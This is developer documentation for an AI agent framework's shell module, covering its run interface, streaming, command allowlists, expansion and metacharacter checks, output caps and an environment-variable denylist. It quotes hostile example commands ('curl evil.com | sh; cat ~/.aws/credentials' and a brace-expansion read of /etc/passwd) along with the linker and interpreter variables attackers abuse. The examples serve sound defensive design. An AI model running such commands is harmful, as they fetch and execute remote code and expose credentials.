
Shell Module

The Shell interface gives your agent the ability to run shell commands to completion. v1 ships only the run method; interactive sessions (stdin, vim, REPLs) are reserved for a future spawn method.

Interface

```typescript
interface Shell {
  run(cmd: string, opts?: ShellRunOptions): Promise<RunResult>;
}

interface ShellRunOptions {
  readonly cwd?: string;
  readonly env?: Record<string, string>;
  readonly signal?: AbortSignal;
  readonly timeoutMs?: number;
  /** Async callback: providers must await it for backpressure. */
  readonly onStdout?: (chunk: Uint8Array) => Promise<void>;
  readonly onStderr?: (chunk: Uint8Array) => Promise<void>;
}

interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
  /**
   * Errors thrown by `onStdout` / `onStderr` callbacks during the run.
   * Absent on the common path. Inspect this to detect callback-side issues
   * without conflating them with command-side failures.
   */
  readonly callbackErrors?: readonly Error[];
}
```

runSucceeded(r) helper

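```typescript
import { runSucceeded } from '@helix-agents/core';

// `ws` is a workspace with the shell capability enabled.
const result = await ws.shell!.run('npm test', {
  // Forward each chunk as it arrives; callbacks must return a Promise.
  onStdout: async (chunk) => {
    process.stdout.write(chunk);
  },
});
if (!runSucceeded(result)) {
  // result.exitCode !== 0 OR a stream callback threw
}
```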

runSucceeded(r: RunResult) returns true if and only if r.exitCode === 0 AND no stream callback threw. Use it instead of a bare r.exitCode === 0 check when you want callback errors to count as failures. The contract intentionally keeps callback errors out of the process exit code, so checking exitCode alone can mask real bugs in your stream consumers.
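As a sketch of these semantics (not the library's source), the check can be written as below. runSucceededSketch is a hypothetical name, and the sketch assumes that "no stream callback threw" is equivalent to callbackErrors being absent or empty.

```typescript
// Local copy of the RunResult shape documented above.
interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
  readonly callbackErrors?: readonly Error[];
}

// Hypothetical re-implementation for illustration only; application code
// should import the real runSucceeded from @helix-agents/core.
function runSucceededSketch(r: RunResult): boolean {
  const callbackFailed = (r.callbackErrors?.length ?? 0) > 0;
  return r.exitCode === 0 && !callbackFailed;
}

const empty = new Uint8Array(0);
const clean: RunResult = { stdout: empty, stderr: empty, exitCode: 0, durationMs: 12 };
// The command exited 0, but the stream consumer threw while parsing output.
const consumerBug: RunResult = { ...clean, callbackErrors: [new Error('parse failed')] };

console.log(clean.exitCode === 0, runSucceededSketch(clean));             // true true
console.log(consumerBug.exitCode === 0, runSucceededSketch(consumerBug)); // true false
```

The second line shows exactly the case a bare exitCode check misses.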

Real-time streaming

The onStdout / onStderr callbacks are how providers stream output as it arrives. The contract:

  • When callbacks ARE present: the provider streams chunks as they're produced and awaits each callback before continuing (backpressure).
  • When callbacks are NOT present: the provider may use a blocking exec call and return everything at once.

Whichever path is taken, result.stdout and result.stderr always contain the FULL accumulated output.
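A minimal sketch of the streaming side of this contract, assuming a provider that exposes output as an AsyncIterable of chunks. pumpStream, concat, and fakeOutput are hypothetical names, not @helix-agents/core exports. Each callback is awaited before the next chunk is pulled (backpressure), every chunk is accumulated whether or not the callback succeeds, and callback failures are collected separately so they can be reported via callbackErrors rather than the exit code.

```typescript
type ChunkCallback = (chunk: Uint8Array) => Promise<void>;

// Joins chunks into one buffer: the "full accumulated output".
function concat(chunks: Uint8Array[]): Uint8Array {
  const total = chunks.reduce((n, c) => n + c.byteLength, 0);
  const out = new Uint8Array(total);
  let offset = 0;
  for (const c of chunks) {
    out.set(c, offset);
    offset += c.byteLength;
  }
  return out;
}

// Hypothetical provider helper: forwards chunks when a callback is present,
// otherwise only collects. Either way the full output is returned.
async function pumpStream(
  source: AsyncIterable<Uint8Array>,
  onChunk: ChunkCallback | undefined,
  callbackErrors: Error[],
): Promise<Uint8Array> {
  const chunks: Uint8Array[] = [];
  for await (const chunk of source) {
    chunks.push(chunk); // accumulate regardless of callback outcome
    if (onChunk) {
      try {
        await onChunk(chunk); // the next chunk is not pulled until this resolves
      } catch (err) {
        // Keep callback failures out of the command's exit code.
        callbackErrors.push(err instanceof Error ? err : new Error(String(err)));
      }
    }
  }
  return concat(chunks);
}

// Usage: a fake two-chunk stream standing in for a real process.
async function* fakeOutput(): AsyncGenerator<Uint8Array> {
  const enc = new TextEncoder();
  yield enc.encode('installing...\n');
  yield enc.encode('done\n');
}
```

A provider following this pattern would set callbackErrors on the RunResult only when the array is non-empty, which keeps the field absent on the common path.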

This dual-mode design lets providers like CloudflareSandboxShell switch between execStream (SSE) when callbacks are present and exec (blocking) when not — without callers needing to know which path is in play.

The auto-injected workspace__<name>__run tool always passes callbacks that emit chunks to the agent's event stream. So when an LLM calls workspace__box__run with { command: 'npm install' } (for a workspace named box) on a provider that supports real-time streaming, you see live progress in your agent stream.

signal.aborted semantics

Providers that support signal MUST break their iteration / kill the underlying process when signal.aborted flips to true. The result.exitCode after abort is provider-specific (typically 0 if no exit event was seen, or -1 if the process was killed before exit).

The CloudflareSandboxShell checks signal.aborted at iteration start in its streaming path — chunks in flight when abort fires are not accumulated and the callback is not invoked.
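The iteration-start check can be sketched as follows, assuming the provider's output arrives as an AsyncIterable. collectUntilAborted is a hypothetical helper; killing the process and choosing an exit code are left out because the text describes both as provider-specific.

```typescript
// Hypothetical streaming loop that checks signal.aborted at the start of
// each iteration, so a chunk that arrives after abort is neither
// accumulated nor passed to the callback.
async function collectUntilAborted(
  source: AsyncIterable<Uint8Array>,
  signal: AbortSignal,
  onChunk: (chunk: Uint8Array) => Promise<void>,
): Promise<{ chunks: Uint8Array[]; aborted: boolean }> {
  const chunks: Uint8Array[] = [];
  for await (const chunk of source) {
    if (signal.aborted) {
      // Returning from for-await also closes the source iterator.
      // A real provider would kill the underlying process here as well.
      return { chunks, aborted: true };
    }
    chunks.push(chunk);
    await onChunk(chunk);
  }
  return { chunks, aborted: false };
}
```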

Auto-injected tool

For a workspace named <name> with the shell capability enabled:

| Tool | Schema | Returns |
|---|---|---|
| `workspace__<name>__run` | `{ command: string; cwd?: string; env?: Record<string, string>; timeoutMs?: number }` | `{ stdout: string; stderr: string; exitCode: number; durationMs: number }` |

The tool emits workspace_stdout / workspace_stderr events to the agent's event stream as chunks arrive — your downstream consumers (the AI SDK frontend, custom event handlers) see live output.
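Roughly, the tool wires the LLM's input into Shell.run and forwards chunks as events. The sketch below uses a hypothetical makeRunTool factory and a simplified WorkspaceEvent payload ({ type, text }); the framework's real event shape may differ, and the allowlist, env, and output-cap checks the real tool performs are omitted.

```typescript
interface RunResult {
  readonly stdout: Uint8Array;
  readonly stderr: Uint8Array;
  readonly exitCode: number;
  readonly durationMs: number;
}
interface Shell {
  run(cmd: string, opts?: {
    cwd?: string;
    env?: Record<string, string>;
    timeoutMs?: number;
    onStdout?: (chunk: Uint8Array) => Promise<void>;
    onStderr?: (chunk: Uint8Array) => Promise<void>;
  }): Promise<RunResult>;
}

// Hypothetical event payload, for illustration only.
type WorkspaceEvent = { type: 'workspace_stdout' | 'workspace_stderr'; text: string };
interface RunToolInput { command: string; cwd?: string; env?: Record<string, string>; timeoutMs?: number }

function makeRunTool(shell: Shell, emit: (e: WorkspaceEvent) => void) {
  return async (input: RunToolInput) => {
    // One streaming decoder per stream so multi-byte characters split
    // across chunks are decoded correctly.
    const out = new TextDecoder();
    const err = new TextDecoder();
    const result = await shell.run(input.command, {
      cwd: input.cwd,
      env: input.env,
      timeoutMs: input.timeoutMs,
      // Always pass callbacks so chunks reach the event stream live.
      onStdout: async (c) => emit({ type: 'workspace_stdout', text: out.decode(c, { stream: true }) }),
      onStderr: async (c) => emit({ type: 'workspace_stderr', text: err.decode(c, { stream: true }) }),
    });
    // The LLM-facing result carries strings decoded from the full buffers.
    const dec = new TextDecoder();
    return {
      stdout: dec.decode(result.stdout),
      stderr: dec.decode(result.stderr),
      exitCode: result.exitCode,
      durationMs: result.durationMs,
    };
  };
}
```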

env limits enforced by the tool

The auto-injected run tool validates the LLM-supplied env map at the framework layer, before the map reaches the provider:

  • At most 256 keys.
  • Each value is at most 64 KB.

Both limits are generous for legitimate use (256 keys covers a normal app environment; 64 KB covers any reasonable secret payload). They exist to reject adversarial prompts that try to exhaust memory on the Node side while the spawn call is being built (e.g. a 100k-key map or a single 100 MB value), which can happen before the OS ever rejects the oversized environment with POSIX E2BIG. Violations throw at the Zod validation step with a clear message; if a legitimate workload hits these limits, they can be revisited in a follow-up.
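A plain-TypeScript sketch of the two limits, written without Zod so it runs standalone. checkEnvLimits is a hypothetical name, and two details are assumptions: that "64 KB" means 64 * 1024 bytes, and that a value's size is measured in UTF-8 bytes rather than string length.

```typescript
// Assumed limits from the text: 256 keys, 64 KB (taken as 64 * 1024 bytes) per value.
const MAX_ENV_KEYS = 256;
const MAX_ENV_VALUE_BYTES = 64 * 1024;

// Hypothetical validator; the real check runs in the tool's Zod schema
// and its error messages will differ. Returns null when env is within limits.
function checkEnvLimits(env: Record<string, string>): string | null {
  const keys = Object.keys(env);
  if (keys.length > MAX_ENV_KEYS) {
    return `env has ${keys.length} keys; at most ${MAX_ENV_KEYS} allowed`;
  }
  const encoder = new TextEncoder();
  for (const key of keys) {
    // Count UTF-8 bytes so multi-byte characters are measured fully.
    const bytes = encoder.encode(env[key]).byteLength;
    if (bytes > MAX_ENV_VALUE_BYTES) {
      return `env.${key} is ${bytes} bytes; at most ${MAX_ENV_VALUE_BYTES} allowed`;
    }
  }
  return null;
}
```

Checking the key count first means a 100k-key map is rejected without encoding any of its values.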

Capability config

```typescript
interface ShellCapConfig {
  /** Allowlist of command first-tokens. Other commands throw at the tool layer. */
  allowedCommands?: readonly string[];
  /** Default timeoutMs applied when the tool input doesn't override. */
  maxDurationMs?: number;
  /** Round-5 (A6): opt in to bash brace/glob/wildcard/tilde expansion. Default false. */
  glob?: boolean;
  /** Round-5 (A8): max bytes returned per stream (stdout, stderr). Default 256 KiB. */
  maxStdoutBytes?: number;
}
```

allowedCommands enforces a first-token allowlist:

```typescript
capabilities: {
  shell: { allowedCommands: ['ls', 'cat', 'wc', 'grep'] },
}
```

The auto-injected tool checks command.split(/\s+/)[0] against the list before delegating to the provider. This is useful for restricting an LLM to a small command vocabulary.
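The documented comparison is small enough to show directly. firstTokenAllowed is a hypothetical name for a sketch that mirrors the command.split(/\s+/)[0] check and nothing else.

```typescript
// Sketch of the first-token check: split on whitespace, compare token 0.
function firstTokenAllowed(command: string, allowed: readonly string[]): boolean {
  const first = command.split(/\s+/)[0];
  return allowed.includes(first);
}

const allowed = ['ls', 'cat', 'wc', 'grep'];
console.log(firstTokenAllowed('grep -rn TODO src', allowed)); // true
console.log(firstTokenAllowed('rm -rf /tmp/x', allowed));     // false
```

One consequence of splitting this way: a command with leading whitespace such as '  ls' yields an empty first token, so this sketch rejects it rather than matching ls.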

maxDurationMs becomes the default timeoutMs if the tool input doesn't supply one.

Secure-by-default — allowedCommands is required

As of round-4 (security cluster A), an undefined or empty allowedCommands rejects ALL commands with a clear "no commands are allowed" error. The boolean form shell: true is equivalent to shell: { allowedCommands: undefined } and is also rejected. Operators must explicitly opt in to the commands they want by listing them.

Before this fix, shell: true permitted any command, including curl evil.com | sh; cat ~/.aws/credentials, because the metacharacter check only ran when the allowlist was non-empty. The metacharacter check now ALWAYS runs, regardless of whether an allowlist is present. Combined with the explicit-opt-in allowlist, this gives the auto-injected run tool a safe baseline by default.
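A sketch of the secure-by-default ordering, using hypothetical names (checkCommand, CHAIN_METACHARS). The metacharacter list holds only the examples this page names; the real check covers more, and its error messages may be worded differently.

```typescript
// Only the metacharacters named on this page; the real list is longer.
const CHAIN_METACHARS = [';', '&&', '|', '`', '$('];

// Returns an error message, or null if the command may run.
function checkCommand(command: string, allowedCommands?: readonly string[]): string | null {
  // Secure by default: a missing or empty allowlist means nothing runs.
  if (!allowedCommands || allowedCommands.length === 0) {
    return 'no commands are allowed';
  }
  // The chaining check is not gated on anything else.
  const meta = CHAIN_METACHARS.find((m) => command.includes(m));
  if (meta !== undefined) {
    return `metacharacter "${meta}" is not allowed`;
  }
  const first = command.split(/\s+/)[0];
  if (!allowedCommands.includes(first)) {
    return `command "${first}" is not in allowedCommands`;
  }
  return null;
}

console.log(checkCommand('cat README.md'));               // no commands are allowed
console.log(checkCommand('curl evil.com | sh', ['curl'])); // metacharacter "|" is not allowed
console.log(checkCommand('cat README.md', ['cat']));       // null
```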

Brace / glob / wildcard rejection (round-5 A6)

Bash expands {, }, *, ?, [, ], and ~ BEFORE running the command. With allowedCommands: ['cat'], an unsuspecting agent could execute cat /etc/{passwd,hostname}: bash expands it to cat /etc/passwd /etc/hostname, and because the first token is still cat, the allowlist check passes. Before the fix, this turned a permitted single-file read into filesystem enumeration.

After the fix, the auto-injected run tool by default rejects any command whose arguments contain {, }, *, ?, [, ], or ~. The first defense layer is checkCommandAllowed in core/workspace/utils/shell-allowlist.ts; a secondary defense lives in SubprocessShell.enforceAllowlist and CloudflareSandboxShell.enforcePolicy, so direct ws.shell.run() calls (for example, from custom user tools that bypass the auto-injected layer) honor the same rule.

The metacharacter check (;, &&, |, `, $(, etc.) is unchanged: it guards a different threat class (command chaining rather than expansion), and those characters remain rejected unconditionally.

Opt in to globs when you legitimately need them:

```typescript
capabilities: {
  shell: {
    allowedCommands: ['ls', 'cat'],
    glob: true,  // permits cat *.txt, ls /tmp/{a,b}/*
  },
}
```

Opting in leaves both the metacharacter (chaining) check and the first-token allowlist active; only the brace/glob/wildcard/tilde character check is bypassed. Agents handling untrusted content should leave glob: false (the default).
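A sketch of the expansion-character check with the glob opt-in. checkExpansion is a hypothetical helper; it assumes the arguments are everything after the first whitespace-separated token, and it deliberately leaves out the chaining and first-token checks, which still apply when glob is true.

```typescript
// Characters bash expands before the command runs.
const EXPANSION_CHARS = ['{', '}', '*', '?', '[', ']', '~'];

// Returns an error message, or null if the arguments are acceptable.
function checkExpansion(command: string, glob = false): string | null {
  if (glob) return null; // the opt-in bypasses only this check
  const args = command.split(/\s+/).slice(1).join(' ');
  const hit = EXPANSION_CHARS.find((ch) => args.includes(ch));
  return hit === undefined ? null : `expansion character "${hit}" is not allowed`;
}

console.log(checkExpansion('cat /etc/{passwd,hostname}'));       // expansion character "{" is not allowed
console.log(checkExpansion('cat /etc/{passwd,hostname}', true)); // null
console.log(checkExpansion('cat notes.txt'));                    // null
```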

stdout/stderr caps (round-5 A8)

The auto-injected run tool truncates stdout and stderr at maxStdoutBytes (default 256 KiB each). Excess bytes are dropped and the tool result carries:

  • stdoutTruncated: true and stdoutOmittedBytes: N (and likewise stderrTruncated / stderrOmittedBytes for stderr)
  • A deterministic suffix \n[... truncated, N bytes omitted; refine your search/path] appended to the truncated stream

Without the cap, an LLM running find / -type f would dump multi-megabyte output into the agent context, overflow the LLM's context window, and silently fail the agent loop. Operators tuning log-analysis agents that legitimately need large output should raise maxStdoutBytes; the default is conservative.
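A sketch of the cap for one stream, assuming the head of the output is kept and the tail dropped (the text says only that excess bytes are dropped). capStream is hypothetical; its truncated and omittedBytes fields would map onto stdoutTruncated / stdoutOmittedBytes, or the stderr equivalents.

```typescript
// Assumed default from the text: 256 KiB per stream.
const DEFAULT_MAX_STDOUT_BYTES = 256 * 1024;

interface CappedStream {
  text: string;
  truncated: boolean;
  omittedBytes: number;
}

// Hypothetical helper: keeps the first maxBytes bytes and appends the
// deterministic suffix quoted above when anything was dropped.
function capStream(bytes: Uint8Array, maxBytes = DEFAULT_MAX_STDOUT_BYTES): CappedStream {
  if (bytes.byteLength <= maxBytes) {
    return { text: new TextDecoder().decode(bytes), truncated: false, omittedBytes: 0 };
  }
  const omittedBytes = bytes.byteLength - maxBytes;
  // subarray avoids a copy; a cut inside a multi-byte UTF-8 character
  // decodes to U+FFFD (the replacement character).
  const kept = new TextDecoder().decode(bytes.subarray(0, maxBytes));
  const suffix = `\n[... truncated, ${omittedBytes} bytes omitted; refine your search/path]`;
  return { text: kept + suffix, truncated: true, omittedBytes };
}

const capped = capStream(new TextEncoder().encode('a'.repeat(300 * 1024)));
console.log(capped.truncated, capped.omittedBytes); // true 45056
```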

The captured streams are wrapped in <workspace_tool_result untrusted="true"> boundary tags (round-5 A9) — see the fs module's untrusted-content section for the design rationale.

Privilege-escalation env denylist

Per-call env is rejected at the Zod schema layer (and again at runtime in SubprocessShell / CloudflareSandboxShell) when it contains any of:

LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT,
DYLD_INSERT_LIBRARIES, DYLD_LIBRARY_PATH,
NODE_OPTIONS, PYTHONPATH, PERL5OPT

These are linker and interpreter knobs that an attacker can use to load arbitrary code into the spawned subprocess after planting a payload via write_file. The denylist matches the literal variable names that the dynamic linker or language runtime reads (case-sensitive, exact match: LD_PRELOAD_FOO is allowed because it is not a recognized linker variable). The full list lives in PRIVILEGE_ESCALATING_ENV_VARS in @helix-agents/core.
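An exact-match check against the names listed above can be sketched as follows. DENYLIST is a local copy for illustration only (the authoritative list is PRIVILEGE_ESCALATING_ENV_VARS, which may contain more entries), and deniedEnvKeys is a hypothetical name.

```typescript
// Local copy of the names listed above; application code should import
// PRIVILEGE_ESCALATING_ENV_VARS from @helix-agents/core instead.
const DENYLIST: ReadonlySet<string> = new Set([
  'LD_PRELOAD', 'LD_LIBRARY_PATH', 'LD_AUDIT',
  'DYLD_INSERT_LIBRARIES', 'DYLD_LIBRARY_PATH',
  'NODE_OPTIONS', 'PYTHONPATH', 'PERL5OPT',
]);

// Exact, case-sensitive key match: returns the offending keys, if any.
function deniedEnvKeys(env: Record<string, string>): string[] {
  return Object.keys(env).filter((key) => DENYLIST.has(key));
}

console.log(deniedEnvKeys({ LD_PRELOAD: '/tmp/evil.so', CI: '1' })); // [ 'LD_PRELOAD' ]
console.log(deniedEnvKeys({ LD_PRELOAD_FOO: 'x' }));                 // []
```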

Deferred features

  • spawn — interactive sessions with stdin streaming, PTY support. Reserved for the v2 shell module.
  • stdin — passing data to a running command. Workaround: use writeFile to a temp path, then command < /tmp/path.
  • PTY — terminal emulation, color codes, vim/nano. Same v2 timeline as spawn.

Provider support matrix

| Provider | shell supported |
|---|---|
| In-Memory | |
| Local Bash | ✅ (subprocess) |
| Cloudflare Filestore | |
| Cloudflare Sandbox | ✅ (with real-time streaming via execStream + SSE) |


Released under the MIT License.